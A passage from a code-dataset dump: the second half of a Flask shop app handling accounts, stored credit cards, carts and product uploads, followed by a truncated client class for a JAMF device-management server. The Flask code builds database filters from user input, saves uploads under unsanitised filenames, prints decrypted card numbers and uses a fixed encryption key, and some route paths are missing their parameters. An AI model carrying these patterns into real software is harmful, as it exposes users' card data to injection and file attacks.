range(6))\n )\n salted_password = form.new_password.data + salt\n hashed_password = generate_password_hash(\n salted_password, method=\"sha256\"\n )\n hashed_password_with_salt = hashed_password + salt\n\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"password\": hashed_password_with_salt},\n )\n\n return redirect(url_for(\"profile\"))\n\n return render_template(\"profile.html\", current_user=current_user, form=form)\n\n\n@app.route(\"/orders\")\n@login_required\ndef orders():\n return render_template(\"orders.html\", current_user=current_user)\n\n\n@app.route(\"/cards\")\n@login_required\ndef cards():\n user = SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {current_user.id}\"\n )[0]\n credit_cards = user.credit_cards\n key = aes.get_fixed_key()\n card_list = []\n\n for credit_card in credit_cards:\n card = aes.decrypt(key, credit_card.card_number, credit_card.iv).decode(\n \"utf8\"\n )\n card_list.append(card)\n\n print(card_list)\n return render_template(\n \"cards.html\",\n current_user=current_user,\n card_list=card_list,\n len=len,\n credit_cards=credit_cards,\n )\n\n\n@app.route(\"/cards/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_cards():\n try:\n if request.method == \"POST\":\n obj = request.json\n cardnum = obj[\"cardnum\"]\n print(cardnum)\n\n if cardnum.isalpha() or len(cardnum) == 0:\n raise Exception(\"Integer only\")\n\n key = aes.get_fixed_key()\n card_number, iv = aes.encrypt(key, cardnum.encode(\"utf8\"))\n exp_date = obj[\"exp_date\"]\n print(exp_date)\n year = exp_date[0:4]\n month = exp_date[5:7]\n day = exp_date[8:]\n date = datetime.datetime(int(year), int(month), int(day))\n\n credit_card = CreditCard(\n user_id=current_user.id,\n card_number=card_number,\n expiry=date,\n iv=iv,\n )\n SecureDB.create(model=\"CreditCard\", object_=credit_card)\n\n return redirect(url_for(\"cards\"))\n\n return render_template(\"add-cards.html\", current_user=current_user)\n except:\n flash(\"An error has occurred\", \"danger\")\n return redirect(url_for(\"add_cards\"))\n\n\n@app.route(\"/cards/remove/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef remove_card(card_id):\n SecureDB.delete(model=\"CreditCard\", filter_=f\"CreditCard.id == {card_id}\")\n return redirect(url_for(\"cards\"))\n\n\n@app.route(\"/cards/update/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_card(card_id):\n try:\n form = forms.CreditForm(request.form)\n key = aes.get_fixed_key()\n\n try:\n card = SecureDB.retrieve(\n model=\"CreditCard\", filter_=f\"CreditCard.id == {card_id}\"\n )[0]\n except:\n abort(404)\n\n credit_card_number = aes.decrypt(key, card.card_number, card.iv).decode(\n \"utf8\"\n )\n\n if request.method == \"POST\":\n obj = request.json\n cardnum = obj[\"cardnum\"]\n\n if cardnum.isalpha() or len(cardnum) == 0:\n raise Exception(\"Integer only\")\n\n key = aes.get_fixed_key()\n card_number, iv = aes.encrypt(key, cardnum.encode(\"utf8\"))\n exp_date = obj[\"exp_date\"]\n print(exp_date)\n year = exp_date[0:4]\n month = exp_date[5:7]\n day = exp_date[8:]\n date = datetime.datetime(int(year), int(month), int(day))\n\n SecureDB.update(\n model=\"CreditCard\",\n filter_=f\"CreditCard.id == {card_id}\",\n values={\n \"card_number\": card_number.hex(),\n \"iv\": iv.hex(),\n \"expiry\": date.strftime(\"%Y-%m-%d\"),\n },\n )\n return redirect(url_for(\"cards\"))\n\n return render_template(\n \"update-card.html\",\n current_user=current_user,\n form=form,\n card=card,\n credit_card_number=credit_card_number,\n )\n except:\n flash(\"An error has occurred\", \"danger\")\n return redirect(url_for(\"cards\"))\n\n\n@app.route(\"/addresses\")\n@login_required\ndef addresses():\n return render_template(\"addresses.html\", current_user=current_user)\n\n\n@app.route(\"/addresses/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_addresses():\n if request.method == \"POST\":\n obj = request.json\n address = obj[\"address\"]\n state = obj[\"state\"]\n city = obj[\"city\"]\n zip_code = obj[\"zipCode\"]\n\n address_object = Address(\n user_id=current_user.id,\n address=address,\n state=state,\n city=city,\n zip_code=int(zip_code),\n )\n SecureDB.create(model=\"Address\", object_=address_object)\n\n return redirect(url_for(\"addresses\"))\n\n return render_template(\"add-addresses.html\", current_user=current_user)\n\n\n@app.route(\"/addresses/remove/\")\n@login_required\ndef remove_addresses(address_id):\n SecureDB.delete(model=\"Address\", filter_=f\"Address.id == {address_id}\")\n return redirect(url_for(\"addresses\"))\n\n\n@app.route(\"/addresses/update/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_address(address_id):\n form = forms.AddressForm(request.form)\n\n try:\n address = SecureDB.retrieve(\n model=\"Address\", filter_=f\"Address.id == {address_id}\"\n )[0]\n except:\n abort(404)\n\n if request.method == \"POST\" and form.validate():\n SecureDB.update(\n model=\"Address\",\n filter_=f\"Address.id == {address_id}\",\n values={\n \"address\": form.address.data,\n \"state\": form.state.data,\n \"city\": form.city.data,\n \"zip_code\": form.zip_code.data,\n },\n )\n return redirect(url_for(\"addresses\"))\n\n return render_template(\n \"update-address.html\",\n current_user=current_user,\n form=form,\n address=address,\n )\n\n\n@app.route(\"/profile/delete\")\n@login_required\ndef delete_profile():\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"status\": False},\n )\n logout_user()\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/admin\")\n@login_required\n@restricted(access_level=\"admin page\")\ndef admin():\n context = {\n \"current_user\": current_user,\n \"users\": SecureDB.retrieve(model=\"User\", filter_=\"User.id > 0\"),\n \"products\": SecureDB.retrieve(\n model=\"Product\", filter_=\"Product.product_id > 0\"\n ),\n \"current_user_roles\": [\n user_role.role.name for user_role in current_user.roles\n ],\n }\n return render_template(\"admin.html\", **context)\n\n\n@app.route(\"/admin/create/user\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"admin\")\ndef staff_signup():\n form = forms.AdminCreateForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n if not (\n SecureDB.retrieve(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n )\n or SecureDB.retrieve(\n model=\"User\", filter_=f\"User.email == '{form.email.data}'\"\n )\n ):\n letters_and_digits = string.ascii_letters + string.digits\n salt = \"\".join(\n (secrets.choice(letters_and_digits) for _ in range(6))\n )\n salted_password = form.password.data + salt\n hashed_password = generate_password_hash(\n salted_password, method=\"sha256\"\n )\n hashed_password_with_salt = hashed_password + salt\n\n new_user = User(\n username=form.username.data,\n email=form.email.data,\n password=hashed_password_with_salt,\n date_created=datetime.datetime.now(),\n status=True,\n )\n\n created_user = SecureDB.create(model=\"User\", object_=new_user)\n\n customer_role = SecureDB.retrieve(\n model=\"Role\", filter_=\"Role.name == 'Customer'\"\n )[0]\n new_user_customer_role = UserRole(\n user_id=created_user.id,\n role_id=customer_role.id,\n role=customer_role,\n )\n\n staff_role = SecureDB.retrieve(\n model=\"Role\", filter_=\"Role.name == 'Staff'\"\n )[0]\n new_user_staff_role = UserRole(\n user_id=created_user.id,\n role_id=staff_role.id,\n role=staff_role,\n )\n\n SecureDB.create(model=\"UserRole\", object_=new_user_customer_role)\n SecureDB.create(model=\"UserRole\", object_=new_user_staff_role)\n return redirect(url_for(\"admin\"))\n\n return redirect(url_for(\"staff_signup\"))\n\n return render_template(\"signup.html\", form=form)\n\n\n@app.route(\"/admin/delete/\")\n@login_required\n@restricted(access_level=\"admin\")\ndef admin_delete(user_id):\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {user_id}\",\n values={\"status\": False},\n )\n return redirect(url_for(\"admin\"))\n\n\n@app.route(\"/product/\", methods=[\"GET\", \"POST\"])\ndef product(product_id):\n form = forms.ReviewForm(request.form)\n product_quantity = forms.ProductQuantity(request.form)\n\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n\n if product.deleted:\n raise Exception\n except:\n abort(404)\n\n reviews = sorted(\n SecureDB.retrieve(\n model=\"Review\", filter_=f\"Review.product_id == {product_id}\"\n ),\n key=lambda x: x.rating,\n )\n reviews = list(\n zip(\n [\n SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {review.user_id}\"\n )[0].username\n for review in reviews\n ],\n reviews,\n )\n )\n sort_by = request.args.get(\"sort-by\")\n\n if sort_by != \"lowest-rating\":\n reviews.reverse()\n\n user_bought = False\n\n if current_user.is_authenticated:\n try:\n user_review = SecureDB.retrieve(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n )[0]\n user_bought = True\n form.review_rating.data = str(user_review.rating)\n form.review_contents.data = user_review.contents\n except:\n user_review = None\n user_orders = SecureDB.retrieve(\n model=\"Orders\", filter_=f\"Orders.user_id == {current_user.id}\"\n )\n\n for user_order in user_orders:\n break_outer_loop = False\n\n for order_product in user_order.order_product:\n if order_product.product_id == product_id:\n user_bought = True\n break_outer_loop = True\n break\n\n if break_outer_loop:\n break\n else:\n user_review = None\n\n if product_quantity.submit.data and product_quantity.validate():\n quantity = product_quantity.product_quantity.data\n return redirect(\n url_for(\"add_to_cart\", product_id=product_id, quantity=quantity)\n )\n\n return render_template(\n \"product.html\",\n product=product,\n form=form,\n reviews=reviews,\n user_review=user_review,\n user_bought=user_bought,\n product_quantity=product_quantity,\n )\n\n\n@app.route(\"/add-review/\", methods=[\"POST\"])\ndef add_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n form = forms.ReviewForm(request.form)\n\n if form.validate():\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n except:\n print(\"No such product.\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n if SecureDB.retrieve(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.product_id \"\n f\"== {product_id})\"\n ),\n ):\n print(\"User already submitted a review for this product.\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n user_orders = SecureDB.retrieve(\n model=\"Orders\", filter_=f\"Orders.user_id == {current_user.id}\"\n )\n user_bought = False\n\n for user_order in user_orders:\n break_outer_loop = False\n\n for order_product in user_order.order_product:\n if order_product.product_id == product_id:\n user_bought = True\n break_outer_loop = True\n break\n\n if break_outer_loop:\n break\n\n if not user_bought:\n print(\"User haven't bought the product.\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n review = Review(\n user_id=current_user.id,\n product_id=product_id,\n rating=form.review_rating.data,\n contents=form.review_contents.data,\n product=product,\n )\n SecureDB.create(model=\"Review\", object_=review)\n\n flash(\"Review added successfully.\", \"success\")\n else:\n flash(\"There was an error while adding your review.\", \"danger\")\n\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\"/edit-review/\", methods=[\"POST\"])\ndef edit_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n form = forms.ReviewForm(request.form)\n\n if form.validate():\n try:\n SecureDB.update(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n values={\n \"rating\": form.review_rating.data,\n \"contents\": form.review_contents.data,\n },\n )\n except:\n print(\n \"No such user and/or product, or user haven't submitted a \"\n \"review for this product.\"\n )\n return redirect(url_for(\"product\", product_id=product_id))\n\n flash(\"Review edited successfully.\", \"success\")\n else:\n flash(\"There was an error while editing your review.\", \"danger\")\n\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\"/delete-review/\", methods=[\"POST\"])\ndef delete_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n try:\n SecureDB.delete(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n )\n except:\n print(\n \"No such user and/or product, or user haven't submitted a review \"\n \"for this product.\"\n )\n return redirect(url_for(\"product\", product_id=product_id))\n\n flash(\"Review deleted successfully.\", \"success\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\n \"/add-to-cart//\", methods=[\"GET\", \"POST\"]\n)\ndef add_to_cart(product_id, quantity):\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n except:\n abort(404)\n\n if quantity > product.quantity or product.quantity == 0:\n flash(\"There is not enough quantity\", \"warning\")\n return redirect(url_for(\"index\"))\n\n try:\n cart = session[\"cart\"]\n product = cart[0]\n product = {int(k): int(v) for k, v in product.items()}\n\n if product_id in product:\n cart_quantity = product[product_id]\n product[product_id] = int(cart_quantity) + int(quantity)\n cart[0] = product\n session[\"cart\"] = cart\n print(cart)\n return redirect(url_for(\"cart\"))\n except:\n print(\"No other item\")\n cart = []\n product = dict()\n\n product[int(product_id)] = int(quantity)\n print(product)\n\n if len(cart) == 0:\n cart.append(product)\n else:\n cart[0] = product\n\n session[\"cart\"] = cart\n return redirect(url_for(\"cart\"))\n\n\n@app.route(\"/delete-from-cart/\", methods=[\"POST\", \"GET\"])\ndef delete_from_cart(product_id):\n cart = session[\"cart\"][0]\n cart.pop(product_id, None)\n session[\"cart\"] = cart\n return redirect(url_for(\"cart\"))\n\n\n@app.route(\"/cart\", methods=[\"POST\", \"GET\"])\ndef cart():\n try:\n cart = []\n product = {}\n cart.append(product)\n\n try:\n cart = session[\"cart\"]\n print(cart)\n product = cart[0]\n except:\n print(\"No other item\")\n\n product_list = []\n\n for product_id in product:\n products = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n product_list.append(products)\n\n cart_form = forms.CartForm(request.form)\n\n while len(cart_form.product_quantity) != len(cart[0]):\n for product_id in cart[0]:\n cart_form.product_quantity.append_entry(cart[0][product_id])\n\n if request.method == \"POST\" and cart_form.validate():\n quantity = cart_form.product_quantity.data\n index = 0\n\n for product_id in product:\n product[product_id] = int(quantity[index])\n index += 1\n\n cart[0] = product\n session[\"cart\"] = cart\n return redirect(url_for(\"checkout\"))\n\n return render_template(\n \"cart.html\", len=len, cart=product_list, form=cart_form\n )\n except:\n flash(\"An error has occurred\")\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/checkout\", methods=[\"GET\", \"POST\"])\n@login_required\ndef checkout():\n checkout_form = forms.Checkout(request.form)\n user = User.query.filter_by(id=current_user.id).first()\n user = SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {current_user.id}\"\n )[0]\n credit_cards = user.credit_cards\n addresses = user.addresses\n key = aes.get_fixed_key()\n card_list = []\n\n for credit_card in credit_cards:\n card = aes.decrypt(key, credit_card.card_number, credit_card.iv).decode(\n \"utf8\"\n )\n card_list.append(\"Card \" + card)\n\n checkout_form.credit_card.choices = card_list\n address_list = [\n (addresses, \"%s\" % (addresses[i].address))\n for i in range(len(addresses))\n ]\n\n checkout_form.address.choices = address_list\n cart = session[\"cart\"]\n products = cart[0]\n product_list = []\n product_quantity = []\n\n for product_id in products:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n product_list.append(product)\n product_quantity.append(products[product_id])\n\n if request.method == \"POST\":\n card = \"\"\n order_product = \"\"\n\n for credit_card in credit_cards:\n if str(credit_card) == checkout_form.credit_card.data:\n card = credit_card\n break\n\n order = Orders(user_id=current_user.id)\n created_order = SecureDB.create(model=\"Orders\", object_=order)\n\n if any(\n product_quantity[i] > product.quantity\n for i, product in enumerate(product_list)\n ):\n flash(\"There is not enough stock\", \"warning\")\n return redirect(url_for(\"cart\"))\n\n for i, product in enumerate(product_list):\n order_product = OrderProduct(\n order_id=created_order.order_id,\n product_id=product.product_id,\n quantity=product_quantity[i],\n product=product,\n )\n SecureDB.create(model=\"OrderProduct\", object_=order_product)\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product.product_id}\",\n values={\"quantity\": product.quantity - product_quantity[i]},\n )\n\n flash(\"Order successfully added\", \"success\")\n return redirect(url_for(\"index\"))\n\n return render_template(\n \"checkout.html\",\n form=checkout_form,\n cart=product_list,\n len=len,\n product_quantity=product_quantity,\n )\n\n\n@app.route(\"/products\", methods=[\"GET\"])\ndef get_products():\n return redirect(\"admin\")\n\n\n@app.route(\"/products/new\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef add_product():\n form = forms.AddProductForm(\n CombinedMultiDict((request.files, request.form))\n )\n\n if request.method == \"POST\" and form.validate():\n if request.files:\n image = request.files[form.image.name]\n print(image)\n image.save(os.path.join(\"static/images\", image.filename))\n print(os.path.join(\"static/images\", image.filename))\n filename = \"images/%s\" % image.filename\n\n product = Product(\n product_name=form.product_name.data,\n description=form.product_description.data,\n image=filename,\n price=form.product_price.data,\n quantity=form.product_quantity.data,\n deleted=False,\n )\n created_product = SecureDB.create(model=\"Product\", object_=product)\n flash(f\"Product {form.product_name} added successfully\", \"success\")\n return redirect(\n url_for(\"product\", product_id=created_product.product_id)\n )\n\n return render_template(\"add-product.html\", form=form)\n\n\n@app.route(\"/products//update\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef update_product(product_id):\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n form = forms.AddProductForm(\n CombinedMultiDict((request.files, request.form))\n )\n\n if request.method == \"POST\" and form.validate():\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product_id}\",\n values={\n \"product_name\": form.product_name.data,\n \"description\": form.product_description.data,\n \"image\": form.image.data,\n \"price\": form.product_price.data,\n \"quantity\": form.product_quantity.data,\n },\n )\n flash(\"This product has been updated!\", \"success\")\n return redirect((url_for(\"get_products\")))\n\n if request.method == \"GET\":\n form.product_name.data = product.product_name\n form.product_description.data = product.description\n form.image.data = product.image\n form.product_price.data = product.price\n form.product_quantity.data = product.quantity\n\n return render_template(\n \"add-product.html\", legend=\"Update Product\", form=form\n )\n\n\n@app.route(\"/products//delete\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"seller\")\ndef delete_product(product_id):\n SecureDB.update(\n model=\"Product\",\n filter_=f\"Product.product_id == {product_id}\",\n values={\"deleted\": True},\n )\n flash(\"Your product has been deleted!\", \"success\")\n return redirect(url_for(\"get_products\"))\n\n\n@app.route(\"/search\")\ndef search():\n query = request.args.get(\"q\")\n\n if query is None:\n search_results = []\n else:\n query = query.strip().lower()\n products = SecureDB.retrieve(\n model=\"Product\", filter_=\"Product.product_id > 0\"\n )\n search_results = [\n product\n for product in products\n if query in product.product_name.lower() and not product.deleted\n ]\n\n return render_template(\n \"search.html\", query=query, search_results=search_results\n )\n\n\n@app.after_request\ndef add_header(response):\n response.headers[\n \"Strict-Transport-Security\"\n ] = \"max-age=31536000; includeSubDomains\"\n response.headers[\"X-Content-Type-Options\"] = \"nosniff\"\n response.headers[\"X-Frame-Options\"] = \"SAMEORIGIN\"\n response.headers[\"X-XSS-Protection\"] = \"1; mode=block\"\n return response\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":33155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"547800101","text":"import requests\nimport time\nfrom urllib.parse import urljoin\nfrom datetime import datetime, timezone\nimport json\nimport pathlib\nfrom typing import Union\nfrom requests.auth import HTTPBasicAuth\nimport html\nimport xml.etree.ElementTree as ET\n\nAUTH_ENDPOINT = \"auth/tokens\"\nMOBILE_DEVICE_ENDPOINT = \"v1/mobile-devices\"\nMOBILE_DEVICE_PRESTAGE_ENDPOINT = \"v1/mobile-device-prestages\"\nSEARCH_DEVICE_ENDPOINT = \"v1/search-mobile-devices\"\nVALIDATION_ENDPOINT = \"auth/current\"\nINVALIDATE_ENDPOINT = \"auth/invalidateToken\"\nCLASSIC_ENDPOINT = \"/JSSResource\"\nCLASSIC_DEVICENAME_ENDPOINT = (\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/DeviceName\"\n)\nDEVICE_RENAMING_RESTRICTION_PROFILE_ID = 127\n\n\n\nclass PCJAMF:\n \"\"\"\n The PCJAMF class provides an interface to the Pine Crest JAMF server for mobile device management (MDM)\n\n Class Methods:\n available: checks to see if the server is accessible\n server (str): the protocol, url, and port of a JAMF server\n path (str): the path to the server. (optional)\n verify (str, bool): whether to verify SSL certificates. Set to a PEM CA store \n for custom validation. Set to False for self-signed certs\n\n Args:\n username: the username to use for authentication\n password: the password to use for authentication\n server: the JAMF server path, including protocol, fqdn, and port\n verify (str, bool): the path to a CA file for cert verification \n or False to disable SSL certificate verification\n\n \"\"\"\n\n jamf_api_root = \"/uapi/\"\n\n @classmethod\n def available(\n cls,\n server: str,\n path: str = \"v1/jamf-pro-server-url\",\n verify: Union[str, bool] = True,\n ) -> bool:\n \"\"\"\n checks to see if the provided jamf server is accessible\n \"\"\"\n\n cls.jamf_url = urljoin(server, cls.jamf_api_root)\n url = urljoin(cls.jamf_url, path)\n response = requests.get(url, verify=verify)\n print(f\"{url}: {response.status_code}\")\n return response.ok or response.status_code == 401\n\n def __init__(\n self, username: str, password: str, server: str, verify: Union[str, bool] = True\n ):\n self.jamf_server = server\n self.jamf_url = urljoin(self.jamf_server, self.jamf_api_root)\n self.session = requests.Session()\n self.session.verify = verify\n self.credentials = (username, password)\n self.session.headers.update({\"Accept\": \"application/json\"})\n self.token = None\n self.auth_expiration = None\n self.classic_session = requests.Session()\n self.classic_session.verify = verify\n self.classic_session.auth = HTTPBasicAuth(username, password)\n self.classic_session.headers.update({\"Accept\": \"application/xml\"})\n\n def __del__(self):\n if self.authenticated:\n self.invalidate()\n self.session.close()\n self.classic_session.close()\n\n def authenticate(self):\n \"\"\"\n Connect to the JAMF server, authenticate using existing credentials, and get an API token\n \"\"\"\n self.session.auth = self.credentials\n r = self.session.post(self._url(AUTH_ENDPOINT))\n if not r.ok:\n raise Exception(f\"Invalid status code found. ({r.status_code})\")\n auth_data = r.json()\n self.token = auth_data[\"token\"]\n self.auth_expiration = datetime.fromtimestamp(auth_data[\"expires\"] / 1000)\n self.session.auth = None\n self.session.headers.update({\"Authorization\": f\"Bearer {self.token}\"})\n\n @property\n def authenticated(self):\n \"\"\"\n Indicates if the server object is currently authenticated\n \"\"\"\n return self.token and self.auth_expiration > datetime.now()\n\n def _url(self, endpoint):\n return urljoin(self.jamf_url, endpoint)\n\n def all_devices(self):\n r = self.session.get(self._url(MOBILE_DEVICE_ENDPOINT))\n return r.json()\n\n def search_devices(self, *, serial=None, name=None, udid=None, asset_tag=None):\n search_params = {\"pageNumber\": 0, \"pageSize\": 100}\n if not any((serial, name, udid, asset_tag)):\n raise Exception(\"You must provide at least one search term\")\n\n if name:\n search_params[\"name\"] = name \n if serial:\n search_params[\"serialNumber\"] = serial\n if udid:\n search_params[\"udid\"] = udid\n if asset_tag:\n search_params[\"assetTag\"] = asset_tag\n\n r = self.session.post(url=self._url(SEARCH_DEVICE_ENDPOINT), json=search_params)\n payload = r.json()\n if payload.get(\"totalCount\", 0) > 0:\n return payload[\"results\"]\n else:\n raise Exception(\n f\"No results found for query\\nserial: {serial}\\nid: {name}\\nudid:{udid}\"\n )\n\n def device(self, device_id, detail=False):\n url = self._url(f\"{MOBILE_DEVICE_ENDPOINT}/{device_id}\")\n if detail:\n url += \"/detail\"\n r = self.session.get(url)\n if r.status_code == 200:\n return r.json()\n\n def update_device_name(self, device_id, name):\n\n url = self._url(\n html.escape(f\"{CLASSIC_DEVICENAME_ENDPOINT}/{name}/id/{device_id}\")\n )\n cr = self.classic_session.post(url=url, data=\"\")\n if cr.status_code != 201:\n return \"Unable to push device name command\"\n\n return cr.text\n\n def wipe_device(self, device_id):\n\n url = self._url(\n html.escape(f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/EraseDevice/id/{device_id}\")\n )\n cr = self.classic_session.post(url=url, data=\"\")\n if cr.status_code != 201:\n return \"Unable to wipe device\"\n\n return cr.text\n\n def update_inventory(self, device_id: int) -> str:\n url = self._url(\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/UpdateInventory/id/{device_id}\"\n )\n cr = self.classic_session.post(url=url)\n if cr.status_code != 201:\n print(url)\n print(cr.text)\n print(cr.status_code)\n raise Exception(\"Unable to push device update inventory\")\n\n return cr.text\n \n def update_os(self, device_id: int, force_install: bool=True)->str:\n install_action = 2 if force_install else 1\n self.flush_mobile_device_commands(device_id=device_id)\n\n url = self._url(\n f\"{CLASSIC_ENDPOINT}/mobiledevicecommands/command/ScheduleOSUpdate/{install_action}/id/{device_id}\"\n )\n cr = self.classic_session.post(url=url)\n if cr.status_code != 201:\n print(url)\n print(cr.text)\n print(cr.status_code)\n raise Exception(\"Unable to push device OS update\")\n\n return cr.text\n\n def clear_location_from_device(self, device_id):\n location = {'building': None,\n 'department': None,\n 'emailAddress': '',\n 'realName': '',\n 'position': '',\n 'phoneNumber': '',\n 'room': '',\n 'username': ''}\n return self.update_device(device_id, location=location)\n\n def delete_device(self, device_id):\n url = self._url(html.escape(f\"{CLASSIC_ENDPOINT}/mobiledevices/id/{device_id}\"))\n print(f\"deleting device {device_id}\")\n cr = self.classic_session.delete(url=url, data=\"\")\n if cr.status_code == 200:\n print(f\"Device {device_id} successfully deleted.\")\n return True\n else:\n print(url)\n print(cr.text)\n raise Exception(\"Unable to push device name command\")\n\n def device_flattened(self, device_id):\n device = {}\n extended_device_info = self.device(device_id=device_id, detail=True)\n device.update(\n {\n k: v\n for k, v in extended_device_info.items()\n if not isinstance(v, list) and not isinstance(v, dict)\n }\n )\n if \"location\" in extended_device_info:\n device.update(\n {\n f\"location_{k}\": v\n for k, v in extended_device_info[\"location\"].items()\n if not isinstance(v, dict) and not isinstance(v, list)\n }\n )\n device.update(\n {\n f\"location_{k}_name\": v[\"name\"]\n for k, v in extended_device_info[\"location\"].items()\n if isinstance(v, dict) or isinstance(v, list)\n }\n )\n if \"ios\" in extended_device_info:\n device.update(\n {\n k: v\n for k, v in extended_device_info[\"ios\"].items()\n if not isinstance(v, dict) and not isinstance(v, list)\n }\n )\n device[\"application_count\"] = len(\n extended_device_info[\"ios\"][\"applications\"]\n )\n device.update(\n {\n f\"network_{k}\": v\n for k, v in extended_device_info[\"ios\"][\"network\"].items()\n }\n )\n return device\n\n def validate(self):\n r = self.session.post(self._url(VALIDATION_ENDPOINT))\n return r.status_code == 200\n\n def invalidate(self):\n if not self.authenticated:\n return True\n r = self.session.post(self._url(INVALIDATE_ENDPOINT))\n if r.ok:\n del self.session.headers[\"Accept\"]\n del self.token\n del self.auth_expiration\n return bool(r.ok)\n\n def change_device_configuration_profile_exclusion(\n self, device_id: int, configuration_profile_id: int, exclude_device: bool = True\n ) -> bool:\n \"\"\"\n Add or remove a mobile device from a mobile device configuration profile exclusion list\n \"\"\"\n device = self.device(device_id=device_id)\n root = self.get_configuration_profile(configuration_profile_id)\n excluded_devices = root.findall(\".//exclusions/mobile_devices\")[0]\n excluded_ids = [\n elm.text for elm in excluded_devices.findall(\"./mobile_device/id\")\n ]\n if exclude_device and device_id not in excluded_ids:\n device_element = ET.SubElement(excluded_devices, \"mobile_device\")\n try:\n ET.SubElement(device_element, \"id\").text = str(device_id)\n ET.SubElement(device_element, \"name\").text = device[\"name\"]\n ET.SubElement(device_element, \"udid\").text = device[\"udid\"]\n ET.SubElement(device_element, \"wifi_mac_address\").text = device[\n \"wifiMacAddress\"\n ]\n except KeyError:\n raise Exception(f\"device was not properly formed. {device}\")\n elif not exclude_device:\n try:\n device_element = excluded_devices.findall(\n f\"./mobile_device/[id='{device_id}']\"\n )[0]\n excluded_devices.remove(device_element)\n except IndexError:\n return True # We don't really care if it's missing from the list\n else:\n return True\n return self.update_configuration_profile(root)\n\n def get_configuration_profile(\n self, configuration_profile_id: int\n ) -> ET.ElementTree:\n r = self.classic_session.get(\n f\"{self.jamf_server}JSSResource/mobiledeviceconfigurationprofiles/id/{configuration_profile_id}\"\n )\n return ET.fromstring(r.text)\n\n def update_configuration_profile(\n self, configuration_profile: ET.ElementTree\n ) -> bool:\n configuration_id = configuration_profile.findall(\"./general/id\")[0].text\n r = self.classic_session.put(\n f\"{self.jamf_server}JSSResource/mobiledeviceconfigurationprofiles/id/{configuration_id}\",\n ET.tostring(configuration_profile),\n )\n return r.status_code == 201\n\n def update_device(self, device_id, payload=None, **kwargs):\n if not payload:\n payload = kwargs\n r = self.session.patch(\n self._url(f\"{MOBILE_DEVICE_ENDPOINT}/{device_id}\"), json=payload\n )\n if not r.ok:\n print(f\"Error {r.status_code}: {r.text}\")\n return r.ok\n\n def set_device_room(self, device_id: int, room_name: str) -> dict:\n \"\"\"\n Method to retrieve a room location from JAMF\n \"\"\"\n return self.update_device(device_id, location={\"room\": room_name})\n\n def get_buildings(self) -> dict:\n return self.get_object_list(\"v1/buildings/\")[\"results\"]\n\n def get_building(self, building_name: str, strip_extra: bool = False):\n buildings = self.get_buildings()\n building = self.get_object_by_name(buildings, building_name)\n if strip_extra:\n building = self.strip_extra_location_information(building)\n return building\n\n def get_departments(self) -> dict:\n return self.get_object_list(\"v1/departments/\")\n\n def get_department(self, department_name: str, strip_extra: bool = True) -> dict:\n departments = self.get_departments()\n department = self.get_object_by_name(departments, department_name)\n if strip_extra:\n department = self.strip_extra_location_information(department)\n return department\n\n def add_device_to_prestage(self, prestage_id: int, device_id: int=None, serial_number: str=None):\n if device_id and not serial_number:\n serial_number = self.device(device_id)['serialNumber']\n current_serials, version_lock = self.get_prestage_serials_and_vlock(prestage_id)\n if serial_number in current_serials:\n return True\n else:\n current_serials.append(serial_number)\n return self.update_prestage_scope(prestage_id, current_serials, version_lock)\n\n def get_prestage_id_for_device(self, device_id: int):\n device_serial = 